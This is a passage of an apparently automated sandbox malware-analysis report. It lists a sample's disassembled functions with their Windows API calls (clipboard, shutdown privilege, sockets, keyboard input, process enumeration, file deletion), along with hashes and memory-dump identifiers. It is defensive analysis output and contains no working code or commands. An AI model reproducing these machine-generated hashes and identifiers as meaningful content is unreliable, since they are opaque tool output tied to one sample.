                                        • Opcode Fuzzy Hash: a76305299df7397de36213d2cc12a71260997ae254c91b229802c7c973a85624
                                        • Instruction Fuzzy Hash: C5617C3580120DAACF15EBE0CE92AFDB7B5AF14341F2441A5E91277192EB306F4DDB64
                                        Function 00C6ED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                        • String ID:
                                        • API String ID: 1737998785-0
                                        • Opcode ID: 3c197ec8e9d1b9688d138e185179c58c40652c3c7d8719733e5e3e4aec776b16
                                        • Instruction ID: 83143e0c0aff42a59c2f810eaf7e2d5ac95d13d632e2d9b60e7791da611a49f2
                                        • Opcode Fuzzy Hash: 3c197ec8e9d1b9688d138e185179c58c40652c3c7d8719733e5e3e4aec776b16
                                        • Instruction Fuzzy Hash: 8B419F39204611AFE720DF15D8C8F29BBE5EF44318F14C09AE4298B6A2C736ED41CB90
                                        Function 00C5E8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00C516C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C5170D
                                          • Part of subcall function 00C516C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C5173A
                                          • Part of subcall function 00C516C3: GetLastError.KERNEL32 ref: 00C5174A
                                        • ExitWindowsEx.USER32(?,00000000), ref: 00C5E932
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                        • String ID: $ $@$SeShutdownPrivilege
                                        • API String ID: 2234035333-3163812486
                                        • Opcode ID: 9d945af22b3383a98175f1a68beb7c9522acf1ad627cd272b1f0ba9d7ead6176
                                        • Instruction ID: 1c612b3fc61c8ab2a0127f25bb090179b3dc0aa96c7d9f6a60121427f8f150ef
                                        • Opcode Fuzzy Hash: 9d945af22b3383a98175f1a68beb7c9522acf1ad627cd272b1f0ba9d7ead6176
                                        • Instruction Fuzzy Hash: A101FE76A10211AFEB582675ACCAFFF725CDB14752F150422FC13E21D2D5B45EC892AC
                                        Function 00C71204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00C71276
                                        • WSAGetLastError.WSOCK32 ref: 00C71283
                                        • bind.WSOCK32(00000000,?,00000010), ref: 00C712BA
                                        • WSAGetLastError.WSOCK32 ref: 00C712C5
                                        • closesocket.WSOCK32(00000000), ref: 00C712F4
                                        • listen.WSOCK32(00000000,00000005), ref: 00C71303
                                        • WSAGetLastError.WSOCK32 ref: 00C7130D
                                        • closesocket.WSOCK32(00000000), ref: 00C7133C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: ErrorLast$closesocket$bindlistensocket
                                        • String ID:
                                        • API String ID: 540024437-0
                                        • Opcode ID: 565c9dc6db718eca7fbb4123f657ca1a244cbb6843dbe994367f8abc212fbab5
                                        • Instruction ID: a7b3d6f98422035df410c48357b1852104929dc750d52a9fb7e20412f9994757
                                        • Opcode Fuzzy Hash: 565c9dc6db718eca7fbb4123f657ca1a244cbb6843dbe994367f8abc212fbab5
                                        • Instruction Fuzzy Hash: 2F417F316001409FD710DF68C499B29BBE6AF46318F18C198E96A9F2E3C771ED85CBA1
                                        Function 00C2B952 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • _free.LIBCMT ref: 00C2B9D4
                                        • _free.LIBCMT ref: 00C2B9F8
                                        • _free.LIBCMT ref: 00C2BB7F
                                        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00C93700), ref: 00C2BB91
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00CC121C,000000FF,00000000,0000003F,00000000,?,?), ref: 00C2BC09
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00CC1270,000000FF,?,0000003F,00000000,?), ref: 00C2BC36
                                        • _free.LIBCMT ref: 00C2BD4B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                        • String ID:
                                        • API String ID: 314583886-0
                                        • Opcode ID: 61c68077aab5afab1ba873870fc36c8d134c6d03c079cc9ab07d2989126e2d22
                                        • Instruction ID: cc8876478ed7b1506d3856b0a08967ed571a73aaf39b0c77adc05211a667e6e7
                                        • Opcode Fuzzy Hash: 61c68077aab5afab1ba873870fc36c8d134c6d03c079cc9ab07d2989126e2d22
                                        • Instruction Fuzzy Hash: 44C15B75904225AFCB20EF79EC41BAEBBB8EF46310F18415AE4A4D7652DB309F41E750
                                        Function 00C5D3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00BF3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BF3A97,?,?,00BF2E7F,?,?,?,00000000), ref: 00BF3AC2
                                          • Part of subcall function 00C5E199: GetFileAttributesW.KERNEL32(?,00C5CF95), ref: 00C5E19A
                                        • FindFirstFileW.KERNEL32(?,?), ref: 00C5D420
                                        • DeleteFileW.KERNEL32(?,?,?,?), ref: 00C5D470
                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C5D481
                                        • FindClose.KERNEL32(00000000), ref: 00C5D498
                                        • FindClose.KERNEL32(00000000), ref: 00C5D4A1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                        • String ID: \*.*
                                        • API String ID: 2649000838-1173974218
                                        • Opcode ID: 5d667c8fc12368cfbbd38d2f1d79acee0c97a9dd7dfcb706b6f496723fb572ed
                                        • Instruction ID: 0171c5bbee5893e5387b9cb9b84b43a04c5cfb055eab565c756b953e4efec835
                                        • Opcode Fuzzy Hash: 5d667c8fc12368cfbbd38d2f1d79acee0c97a9dd7dfcb706b6f496723fb572ed
                                        • Instruction Fuzzy Hash: 3131A2710083459BC314EF64C8919BFB7E8AE91341F444A5DF9D693191EB30AA4DC767
                                        Function 00C2E4FF Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: __floor_pentium4
                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                        • API String ID: 4168288129-2761157908
                                        • Opcode ID: 8b6b1f5f73450446c02d9c26a4e48fed4245456ffefbf2e2f7941b5a50dedfef
                                        • Instruction ID: 97bc87873a063ea1af750a4acd881158b44911f412d8d13396fde8c3b7349c22
                                        • Opcode Fuzzy Hash: 8b6b1f5f73450446c02d9c26a4e48fed4245456ffefbf2e2f7941b5a50dedfef
                                        • Instruction Fuzzy Hash: D2C23A72E046288FDB25CE68ED407EAB7B5EB49304F1441FAD85DE7640E774AE829F40
                                        Function 00C6648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON
                                        Download Yara Rule
                                        APIs
                                        • _wcslen.LIBCMT ref: 00C664DC
                                        • CoInitialize.OLE32(00000000), ref: 00C66639
                                        • CoCreateInstance.OLE32(00C8FCF8,00000000,00000001,00C8FB68,?), ref: 00C66650
                                        • CoUninitialize.OLE32 ref: 00C668D4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: CreateInitializeInstanceUninitialize_wcslen
                                        • String ID: .lnk
                                        • API String ID: 886957087-24824748
                                        • Opcode ID: b0429282c35af3aa0d923a559c3cdd1d58efc6211e5608adb8885bf19ed22be3
                                        • Instruction ID: bce947c3e50160866776ce458477706fa1d765607d45ee641a1865afa6072819
                                        • Opcode Fuzzy Hash: b0429282c35af3aa0d923a559c3cdd1d58efc6211e5608adb8885bf19ed22be3
                                        • Instruction Fuzzy Hash: 74D13A715083059FC314EF24C881A6BB7E9FF98704F1049ADF5968B291EB70EE49CB92
                                        Function 00C722DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetForegroundWindow.USER32(?,?,00000000), ref: 00C722E8
                                          • Part of subcall function 00C6E4EC: GetWindowRect.USER32(?,?), ref: 00C6E504
                                        • GetDesktopWindow.USER32 ref: 00C72312
                                        • GetWindowRect.USER32(00000000), ref: 00C72319
                                        • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00C72355
                                        • GetCursorPos.USER32(?), ref: 00C72381
                                        • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00C723DF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                        • String ID:
                                        • API String ID: 2387181109-0
                                        • Opcode ID: 797ebae557b1a73e1a57a83dc9b2ab7393c75a590a0dd9f964210d660571ce25
                                        • Instruction ID: bbe748114b2a48596a939fb6465f006bda89f80dc77c26df444a62d53da34923
                                        • Opcode Fuzzy Hash: 797ebae557b1a73e1a57a83dc9b2ab7393c75a590a0dd9f964210d660571ce25
                                        • Instruction Fuzzy Hash: D231F2721043159FC720DF14D848F5BB7ADFF84310F004919F89897191DB34EA08CB95
                                        Function 00C69B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00BF9CB3: _wcslen.LIBCMT ref: 00BF9CBD
                                        • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00C69B78
                                        • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00C69C8B
                                          • Part of subcall function 00C63874: GetInputState.USER32 ref: 00C638CB
                                          • Part of subcall function 00C63874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C63966
                                        • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00C69BA8
                                        • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00C69C75
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                        • String ID: *.*
                                        • API String ID: 1972594611-438819550
                                        • Opcode ID: 4cbf85cb32e71be94791f2886ddb2bf3258a0bd82631015efbdcadb1594eb877
                                        • Instruction ID: 98e4945cbb7884e007df844368755853ed340bcd4b86f2aa704743520bc4b06c
                                        • Opcode Fuzzy Hash: 4cbf85cb32e71be94791f2886ddb2bf3258a0bd82631015efbdcadb1594eb877
                                        • Instruction Fuzzy Hash: F9414D7190420AAFCF25DF64C989AEEBBF8EF45350F244196E815A3191EB309F84DF64
                                        Function 00C0997D Relevance: 7.9, APIs: 5, Instructions: 375COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00C09BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00C09BB2
                                        • DefDlgProcW.USER32(?,?,?,?,?), ref: 00C09A4E
                                        • GetSysColor.USER32(0000000F), ref: 00C09B23
                                        • SetBkColor.GDI32(?,00000000), ref: 00C09B36
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Color$LongProcWindow
                                        • String ID:
                                        • API String ID: 3131106179-0
                                        • Opcode ID: a08b470d472d2f6d4892759e10438082fe69f7dcd9ca291fc768bfaf97ac78b5
                                        • Instruction ID: 49a7176bedb0c3d9a4c894c853f36984a823fd27d80051573d21255149f460ff
                                        • Opcode Fuzzy Hash: a08b470d472d2f6d4892759e10438082fe69f7dcd9ca291fc768bfaf97ac78b5
                                        • Instruction Fuzzy Hash: 2FA10970209444AEEB25AA2E8C98FBF3A5DEB86354F150209F522D65E3CB359F01E375
                                        Function 00C71806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00C7304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00C7307A
                                          • Part of subcall function 00C7304E: _wcslen.LIBCMT ref: 00C7309B
                                        • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00C7185D
                                        • WSAGetLastError.WSOCK32 ref: 00C71884
                                        • bind.WSOCK32(00000000,?,00000010), ref: 00C718DB
                                        • WSAGetLastError.WSOCK32 ref: 00C718E6
                                        • closesocket.WSOCK32(00000000), ref: 00C71915
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                        • String ID:
                                        • API String ID: 1601658205-0
                                        • Opcode ID: f71a039df51cf528a3588f2b5deba9133cb279e252a71f5a7ebc86958d9ad679
                                        • Instruction ID: 7ca33df3731279eb609909243bf1fec6d5cbece6f2a72bc016e1968999e88417
                                        • Opcode Fuzzy Hash: f71a039df51cf528a3588f2b5deba9133cb279e252a71f5a7ebc86958d9ad679
                                        • Instruction Fuzzy Hash: 80519171A00214AFDB10AF24C886F3AB7E5AB44718F19809CFA195F3D3C771AD45CBA1
                                        Function 00C81C41 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                        • String ID:
                                        • API String ID: 292994002-0
                                        • Opcode ID: 7869a05c3954c8c377f5f1e8d96f17e5fca4a5e0186a972615fa72a30ee6df3a
                                        • Instruction ID: af5261c78c1467b1646c3a3ade8b3cfbb3445ffec972970fc66d3221d2b9338d
                                        • Opcode Fuzzy Hash: 7869a05c3954c8c377f5f1e8d96f17e5fca4a5e0186a972615fa72a30ee6df3a
                                        • Instruction Fuzzy Hash: 8021D3317402115FD720AF1AC884B6ABBE9EF85319B1D8068EC5ACB351C771ED43CBA8
                                        Function 00BF8060 Relevance: 7.4, Strings: 5, Instructions: 1151COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                        • API String ID: 0-1546025612
                                        • Opcode ID: 7edffb5e3fad68d206a7354ec9138c48b75ca1af3254b716b5cb46a4bc105594
                                        • Instruction ID: 7f5e07112d03bb7c7fadd89812fdd496e8f6a5750a07de196a69c6182b6cbcdb
                                        • Opcode Fuzzy Hash: 7edffb5e3fad68d206a7354ec9138c48b75ca1af3254b716b5cb46a4bc105594
                                        • Instruction Fuzzy Hash: 3CA27E71E1061EDBDF24CF58C9807BEB7B1BB54314F2481A9E925AB284DB709E85CB90
                                        Function 00C7A67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00C7A6AC
                                        • Process32FirstW.KERNEL32(00000000,?), ref: 00C7A6BA
                                          • Part of subcall function 00BF9CB3: _wcslen.LIBCMT ref: 00BF9CBD
                                        • Process32NextW.KERNEL32(00000000,?), ref: 00C7A79C
                                        • CloseHandle.KERNEL32(00000000), ref: 00C7A7AB
                                          • Part of subcall function 00C0CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00C33303,?), ref: 00C0CE8A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                        • String ID:
                                        • API String ID: 1991900642-0
                                        • Opcode ID: c7652d504a5be03177cc2ce417729726c584b42f2e4ea76ee8e18c249a2ccba9
                                        • Instruction ID: 5e718fce6f7d85d005563123b52be916b668ebc346ea9184c9170cf3eceba030
                                        • Opcode Fuzzy Hash: c7652d504a5be03177cc2ce417729726c584b42f2e4ea76ee8e18c249a2ccba9
                                        • Instruction Fuzzy Hash: 9D515D71508304AFD714EF24C886A6FBBE8FF89754F00895DF59997292EB30D908CB92
                                        Function 00C5AA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00C5AAAC
                                        • SetKeyboardState.USER32(00000080), ref: 00C5AAC8
                                        • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00C5AB36
                                        • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00C5AB88
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: KeyboardState$InputMessagePostSend
                                        • String ID:
                                        • API String ID: 432972143-0
                                        • Opcode ID: 53d63c81c64f433c5e518285bd1eb040d9306bde9901d06f81e83146950df874
                                        • Instruction ID: b1c56195cd4a7f60906e3cc89e31e55030248808d5e791eeb19ff671e01e109c
                                        • Opcode Fuzzy Hash: 53d63c81c64f433c5e518285bd1eb040d9306bde9901d06f81e83146950df874
                                        • Instruction Fuzzy Hash: 5D312834A40208AFFF348A66CC05BFA7BA6AB44312F04431AF891521D1D3758AC9D7EA
                                        Function 00C6CE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • InternetReadFile.WININET(?,?,00000400,?), ref: 00C6CE89
                                        • GetLastError.KERNEL32(?,00000000), ref: 00C6CEEA
                                        • SetEvent.KERNEL32(?,?,00000000), ref: 00C6CEFE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
